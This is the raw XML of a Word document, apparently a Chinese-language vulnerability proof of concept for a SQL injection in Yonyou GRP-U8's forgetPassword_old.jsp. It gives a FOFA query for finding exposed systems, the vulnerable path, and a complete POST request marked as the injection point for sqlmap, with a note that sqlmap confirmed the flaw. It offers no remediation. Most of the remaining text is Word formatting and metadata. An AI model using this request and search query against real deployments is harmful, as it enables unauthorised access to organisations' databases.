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t>用友GRP-U8 forgetPassword_old.jsp 存在sql注入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fofa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app="用友-GRP-U8"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/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49215" cy="2378710"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1397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9215" cy="2378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隐患URL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/u8qx/forgetPassword_old.jsp?action=save</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/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77790" cy="2270760"/>
            <wp:effectExtent l="0" t="0" r="381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7790" cy="2270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抓取数据包如下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POST /u8qx/forgetPassword_old.jsp?action=save HTTP/1.1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Host: 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User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0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Content-Length: 43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Accept-Encoding: gzip, deflate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Connection: close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Content-Type: application/x-www-form-urlencoded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idCard=1*&amp;inputDW=1&amp;userName=1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sqlmap验证如下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11750" cy="3204845"/>
            <wp:effectExtent l="0" t="0" r="8890" b="1079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1750" cy="3204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0BAE3F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="840BAE3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VlNmU0MDY3ZjU0MTgxOGRiNjg4OTc5NWFkNGI1NmUifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="00C72D96"/>
    <w:rsid w:val="0FD5244A"/>
    <w:rsid w:val="527F5A5C"/>
    <w:rsid w:val="55BE47B7"/>
    <w:rsid w:val="6EB2181E"/>
    <w:rsid w:val="777E3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52</Words>
  <Characters>383</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>14</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>400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2023-10-26T07:01:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-26T13:07:56Z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9F7550F73647464A91EC1652B2A16F1B_12</vt:lpwstr>
  </property>
</Properties>
</file>